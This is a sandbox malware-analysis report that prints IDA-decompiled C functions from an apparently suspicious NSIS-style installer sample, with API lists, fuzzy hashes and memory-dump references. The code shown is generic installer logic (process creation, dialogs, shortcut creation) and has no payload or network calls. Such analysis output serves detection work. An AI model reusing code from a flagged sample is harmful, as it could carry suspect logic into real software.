Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 004045F9 Relevance: 1.5, APIs: 1, Instructions: 6
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004045F9(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x42a268, 0x28, _a4, 1); // executed
				return _t2;
			}

0x00404607
0x0040460d

APIs

SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 70666cfd2db8a5712e0e3ed728d50a5e19955e25533eceda6abdc0f56bdf790a
Instruction ID: 26063d6d883ff380d2e1d7f9fe2b9d631bf033e6200e0a233fd0d302f8c02db7
Opcode Fuzzy Hash: 70666cfd2db8a5712e0e3ed728d50a5e19955e25533eceda6abdc0f56bdf790a
Instruction Fuzzy Hash: 5BB01235286A00FBDE614B00DE09F457E62F764B01F048078F741240F0CAB300B5DF19

Uniqueness

Uniqueness Score: -1.00%

Function 004045E6 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004045E6(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x423744, _a4); // executed
				return _t2;
			}

0x004045f0
0x004045f6

APIs

KiUserCallbackDispatcher.NTDLL(?,004043BD), ref: 004045F0

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: b9cabee76f1705efe6df0b682491f715d60f75bd340f366a7093c5de42737780
Instruction ID: 97f05af551d2e904d84950d91e3a9b28448307360fbef328a82585e9573e9e03
Opcode Fuzzy Hash: b9cabee76f1705efe6df0b682491f715d60f75bd340f366a7093c5de42737780
Instruction Fuzzy Hash: DBA001B6604500ABDE129F61EF09D0ABB72EBA4B02B418579A28590034CA365961FB1D

Uniqueness

Uniqueness Score: -1.00%

Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00401FA4(void* __ecx) {
				void* _t9;
				intOrPtr _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t17 = __ecx;
				_t19 = E00402DA6(_t15);
				E004056CA(0xffffffeb, _t7);
				_t9 = E00405C4B(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
						_t13 = E00406AE0(_t17, _t20);
						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E004065AF( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}

0x00401fa4
0x00401faa
0x00401faf
0x00401fb5
0x00401fba
0x00401fbe
0x0040292e
0x00401fc4
0x00401fc7
0x00401fca
0x00401fd2
0x00401fe1
0x00401fe3
0x00401fe3
0x00401fd4
0x00401fd8
0x00401fd8
0x00401fd2
0x00401fea
0x00401feb
0x00401feb
0x00402c2d
0x00402c39

APIs

Part of subcall function 004056CA: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
Part of subcall function 004056CA: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll,004030A8), ref: 00405725
Part of subcall function 004056CA: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll), ref: 00405737
Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785

Part of subcall function 00405C4B: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,00000000,00000000), ref: 00405C74
Part of subcall function 00405C4B: CloseHandle.KERNEL32(?), ref: 00405C81

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB

Part of subcall function 00406AE0: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
Part of subcall function 00406AE0: GetExitCodeProcess.KERNEL32(?,?), ref: 00406B13

Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: 8167ccd890c8e3f23bc8d286bd9f1b71588b31937b09ab415f675532f6c5344c
Instruction ID: 7fe263eab699b123ac8c37dffe14ee58438593542e676086741668bd6549bbba
Opcode Fuzzy Hash: 8167ccd890c8e3f23bc8d286bd9f1b71588b31937b09ab415f675532f6c5344c
Instruction Fuzzy Hash: 3DF09072905112EBDF21BBA59AC4DAE76A4DF01318B25453BE102B21E0D77C4E528A6E

Uniqueness

Uniqueness Score: -1.00%

Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004014D7(intOrPtr __edx) {
				long _t3;
				void* _t7;
				intOrPtr _t10;
				void* _t13;

				_t10 = __edx;
				_t3 = E00402D84(_t7);
				 *((intOrPtr*)(_t13 - 0x10)) = _t10;
				if(_t3 <= 1) {
					_t3 = 1;
				}
				Sleep(_t3); // executed
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t13 - 4));
				return 0;
			}

0x004014d7
0x004014d8
0x004014e1
0x004014e4
0x004014e8
0x004014e8
0x004014ea
0x00402c2d
0x00402c39

APIs

Sleep.KERNELBASE(00000000), ref: 004014EA

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 15a9c0a1a05cffc918dcbcc278dd47063fd183ee82f4bdf0f9578bef0d0e5dce
Instruction ID: bbd52a04332822db077aadb4670005be58b9dadf0e212328a8e92bdd2ddecc01
Opcode Fuzzy Hash: 15a9c0a1a05cffc918dcbcc278dd47063fd183ee82f4bdf0f9578bef0d0e5dce
Instruction Fuzzy Hash: 1BD05E73A141018BD714EBB8BE8545E73A8EB503193208837D442E1191E6788896861C

Uniqueness

Uniqueness Score: -1.00%

Function 742512BB Relevance: 1.3, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E742512BB() {
				void* _t3;

				_t3 = GlobalAlloc(0x40,  *0x7425506c +  *0x7425506c); // executed
				return _t3;
			}

0x742512c5
0x742512cb

APIs

GlobalAlloc.KERNELBASE(00000040,?,742512DB,?,7425137F,00000019,742511CA,-000000A0), ref: 742512C5

Memory Dump Source

Source File: 00000000.00000002.1945649868.0000000074251000.00000020.00000001.01000000.00000004.sdmp, Offset: 74250000, based on PE: true

Associated: 00000000.00000002.1945555867.0000000074250000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1945760877.0000000074254000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1945856765.0000000074256000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74250000_SecuriteInfo.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 948987d11efbe21d6e71376ad4a9ea6d79a0135c9a81adbf8eaf1ae9533461fc
Instruction ID: da510f228f3eedd6f1489a28091cb0994065223e3bd6ec97ca59e7ae9a3f2150
Opcode Fuzzy Hash: 948987d11efbe21d6e71376ad4a9ea6d79a0135c9a81adbf8eaf1ae9533461fc
Instruction Fuzzy Hash: CFB01272B54000DFEE008F6DCC0EF74B2ACE704311F344080FA00C0185C12088209534

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404AB5 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00404AB5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x422720; // 0x59d41c
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405CAC(0x3fb, _t146);
					E004068EF(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405CAC(0x3fb, _t146);
							if(E0040603F(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E00406668(0x421718, _t146);
							_t87 = E00406A35(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406668(0x421718, _t146);
								_t89 = E00405FE2(0x421718);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x421718) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405F83(0x421718);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x421718) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404F52(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
									E00404F3A(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x421708);
									} else {
										E00404E71(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a304 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004045E6(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x423738 == _t158) {
									E00404A0E();
								}
								 *0x423738 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x423748;
							_v60 = E00404E0B;
							_v56 = _t146;
							_v68 = E004066A5(_t146, 0x423748, _t167, 0x421f20, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405F37(_t146);
								_t125 =  *((intOrPtr*)( *0x42a270 + 0x11c));
								if( *((intOrPtr*)( *0x42a270 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Local\\Temp") {
									E004066A5(_t146, 0x423748, _t167, 0, _t125);
									if(lstrcmpiW(0x428200, 0x423748) != 0) {
										lstrcatW(_t146, 0x428200);
									}
								}
								 *0x423738 =  *0x423738 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405FAE(_t146) != 0 && E00405FE2(_t146) == 0) {
						E00405F37(_t146);
					}
					 *0x429238 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004045C4(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004045C4(_t167);
					E004045F9(_t166);
					_t138 = E00406A35(8);
					if(_t138 == 0) {
						L53:
						return E0040462B(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}

0x00404ab5
0x00404abb
0x00404ac1
0x00404ace
0x00404adc
0x00404adf
0x00404ae7
0x00404aed
0x00404aed
0x00404af9
0x00404afc
0x00404b6a
0x00404b71
0x00404c48
0x00404c4f
0x00404c5e
0x00404c5e
0x00404c62
0x00404c6c
0x00404c79
0x00404c7b
0x00404c7b
0x00404c89
0x00404c90
0x00404c97
0x00404c9a
0x00404cd6
0x00404cd8
0x00404cde
0x00404ce3
0x00404ce7
0x00404ce9
0x00404ce9
0x00404d05
0x00000000
0x00404d07
0x00404d0a
0x00404d18
0x00404d1e
0x00404d1f
0x00404d22
0x00404d25
0x00000000
0x00404d25
0x00404c9c
0x00404c9e
0x00404ca2
0x00000000
0x00000000
0x00000000
0x00000000
0x00404ca4
0x00404ca4
0x00404cb1
0x00404cb6
0x00000000
0x00000000
0x00404cba
0x00404cbc
0x00404cbc
0x00404cc5
0x00404cc7
0x00404ccc
0x00404ccf
0x00404cd4
0x00000000
0x00000000
0x00000000
0x00000000
0x00404cd4
0x00404d31
0x00404d3b
0x00404d3e
0x00404d41
0x00404d48
0x00404d48
0x00404d4a
0x00404d4a
0x00404d4f
0x00404d51
0x00404d59
0x00404d60
0x00404d62
0x00404d6d
0x00404d6d
0x00404d62
0x00404d7d
0x00404d87
0x00404d8f
0x00404daa
0x00404d91
0x00404d9a
0x00404d9a
0x00404d8f
0x00404daf
0x00404db4
0x00404db9
0x00404dc2
0x00404dc2
0x00404dcb
0x00404dcd
0x00404dcd
0x00404dd9
0x00404de1
0x00404deb
0x00404deb
0x00404df0
0x00000000
0x00404df0
0x00404c9a
0x00404c51
0x00404c58
0x00000000
0x00000000
0x00000000
0x00404c58
0x00404b77
0x00404b80
0x00404b9a
0x00404b9f
0x00404ba9
0x00404bb0
0x00404bbc
0x00404bbf
0x00404bc2
0x00404bc9
0x00404bd1
0x00404bd4
0x00404bd8
0x00404bdf
0x00404be7
0x00404c41
0x00404be9
0x00404bea
0x00404bf1
0x00404bfb
0x00404c03
0x00404c10
0x00404c24
0x00404c28
0x00404c28
0x00404c24
0x00404c2d
0x00404c3a
0x00404c3a
0x00404be7
0x00000000
0x00404b9f
0x00404b8d
0x00000000
0x00000000
0x00404b93
0x00000000
0x00404afe
0x00404b0b
0x00404b14
0x00404b21
0x00404b21
0x00404b28
0x00404b2e
0x00404b37
0x00404b3a
0x00404b3d
0x00404b45
0x00404b48
0x00404b4b
0x00404b51
0x00404b58
0x00404b5f
0x00404df6
0x00404e08
0x00404b65
0x00404b68
0x00000000
0x00404b68
0x00404b5f

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404B04
SetWindowTextW.USER32(00000000,?), ref: 00404B2E
SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
CoTaskMemFree.OLE32(00000000), ref: 00404BEA
lstrcmpiW.KERNEL32(Call,00423748,00000000,?,?), ref: 00404C1C
lstrcatW.KERNEL32(?,Call), ref: 00404C28
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C3A

Part of subcall function 00405CAC: GetDlgItemTextW.USER32(?,?,00000400,00404C71), ref: 00405CBF

Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,762E3420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
Part of subcall function 004068EF: CharNextW.USER32(?,00000000,762E3420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
Part of subcall function 004068EF: CharPrevW.USER32(?,?,762E3420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979

GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18

Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
Part of subcall function 00404E71: SetDlgItemTextW.USER32(?,00423748), ref: 00404F2E

Strings

A, xrefs: 00404BD8
Call, xrefs: 00404C16, 00404C1B, 00404C26
C:\Users\user\AppData\Local\Temp, xrefs: 00404C05
H7B, xrefs: 00404BB2

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\Temp$Call$H7B
API String ID: 2624150263-3840399979
Opcode ID: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
Opcode Fuzzy Hash: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69

Uniqueness

Uniqueness Score: -1.00%

Function 004021AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129
comCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E004021AA(void* __eflags) {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405FAE( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Arthur\\AppData\\Local\\Temp");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}

0x004021b3
0x004021bd
0x004021c7
0x004021d1
0x004021dc
0x004021df
0x004021f9
0x004021fc
0x00402202
0x00402205
0x0040220f
0x00402213
0x00402213
0x00402218
0x00402229
0x00402231
0x004022e8
0x004022e8
0x004022ef
0x00402237
0x00402237
0x00402246
0x0040224a
0x0040224d
0x00402253
0x00402261
0x00402264
0x00402266
0x00402271
0x00402271
0x00402276
0x00402278
0x0040227f
0x0040227f
0x00402282
0x0040228b
0x0040228e
0x00402294
0x00402296
0x004022a0
